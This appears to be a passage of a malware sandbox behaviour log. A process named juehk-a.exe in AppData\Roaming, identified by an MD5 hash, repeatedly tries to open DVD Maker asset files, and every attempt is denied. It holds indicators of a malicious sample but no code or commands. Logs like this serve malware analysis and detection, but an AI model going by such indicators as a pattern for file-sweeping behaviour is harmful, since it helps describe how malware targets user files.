- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90778
- mode: failed
- sequenceNumber: 1887
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90785
- mode: failed
- sequenceNumber: 1888
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90792
- mode: failed
- sequenceNumber: 1889
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90798
- mode: failed
- sequenceNumber: 1890
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90805
- mode: failed
- sequenceNumber: 1891
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90811
- mode: failed
- sequenceNumber: 1892
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\pushplaysubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90819
- mode: failed
- sequenceNumber: 1893
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90825
- mode: failed
- sequenceNumber: 1894
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90831
- mode: failed
- sequenceNumber: 1895
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_VideoInset.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90844
- mode: failed
- sequenceNumber: 1896
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90850
- mode: failed
- sequenceNumber: 1897
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\15x15dot.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90857
- mode: failed
- sequenceNumber: 1898
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\colorcycle.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90862
- mode: failed
- sequenceNumber: 1899
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\huemainsubpicture2.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90869
- mode: failed
- sequenceNumber: 1900
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90875
- mode: failed
- sequenceNumber: 1901
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90882
- mode: failed
- sequenceNumber: 1902
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90888
- mode: failed
- sequenceNumber: 1903
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90894
- mode: failed
- sequenceNumber: 1904
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90900
- mode: failed
- sequenceNumber: 1905
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90909
- mode: failed
- sequenceNumber: 1906
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\title_stripe.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90916
- mode: failed
- sequenceNumber: 1907
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\1047x576black.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90922
- mode: failed
- sequenceNumber: 1908
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\203x8subpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90927
- mode: failed
- sequenceNumber: 1909
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90934
- mode: failed
- sequenceNumber: 1910
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\layers.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90940
- mode: failed
- sequenceNumber: 1911
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90947
- mode: failed
- sequenceNumber: 1912
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90955
- mode: failed
- sequenceNumber: 1913
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90963
- mode: failed
- sequenceNumber: 1914
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90969
- mode: failed
- sequenceNumber: 1915
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90976
- mode: failed
- sequenceNumber: 1916
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90996
- mode: failed
- sequenceNumber: 1917
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-background.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91002
- mode: failed
- sequenceNumber: 1918
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-highlight.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91008
- mode: failed
- sequenceNumber: 1919
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-image-mask.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91015
- mode: failed
- sequenceNumber: 1920
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91021
- mode: failed
- sequenceNumber: 1921
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\background.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91027
- mode: failed
- sequenceNumber: 1922
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-back-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91041
- mode: failed
- sequenceNumber: 1923
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-next-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91047
- mode: failed
- sequenceNumber: 1924
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-previous-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91053
- mode: failed
- sequenceNumber: 1925
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91059
- mode: failed
- sequenceNumber: 1926
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91075
- mode: failed
- sequenceNumber: 1927
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Memories_buttonClear.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91082
- mode: failed
- sequenceNumber: 1928
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91088
- mode: failed
- sequenceNumber: 1929
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_content-background.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91098
- mode: failed
- sequenceNumber: 1930
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91104
- mode: failed
- sequenceNumber: 1931
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_content-background.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91111
- mode: failed
- sequenceNumber: 1932
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_mainImage-mask.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91124
- mode: failed
- sequenceNumber: 1933
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_select-highlight.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91129
- mode: failed
- sequenceNumber: 1934
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\menu_style_default_Thumbnail.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91133
- mode: failed
- sequenceNumber: 1935
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91137
- mode: failed
- sequenceNumber: 1936
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91142
- mode: failed
- sequenceNumber: 1937
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91147
- mode: failed
- sequenceNumber: 1938
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91151
- mode: failed
- sequenceNumber: 1939
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91156
- mode: failed
- sequenceNumber: 1940
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91161
- mode: failed
- sequenceNumber: 1941
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\1047x576black.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91166
- mode: failed
- sequenceNumber: 1942
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\15x15dot.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91172
- mode: failed
- sequenceNumber: 1943
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\decorative_rule.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91177
- mode: failed
- sequenceNumber: 1944
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationLeft_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91184
- mode: failed
- sequenceNumber: 1945
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationLeft_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91191
- mode: failed
- sequenceNumber: 1946
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91198
- mode: failed
- sequenceNumber: 1947
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91204
- mode: failed
- sequenceNumber: 1948
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91209
- mode: failed
- sequenceNumber: 1949
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91215
- mode: failed
- sequenceNumber: 1950
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\vintage.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91223
- mode: failed
- sequenceNumber: 1951
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\720x480blacksquare.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91230
- mode: failed
- sequenceNumber: 1952
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIcon.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91701
- mode: failed
- sequenceNumber: 1953
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIconSubpictur.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91706
- mode: failed
- sequenceNumber: 1954
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91712
- mode: failed
- sequenceNumber: 1955
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91730
- mode: failed
- sequenceNumber: 1956
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIcon.png
- processinfo:
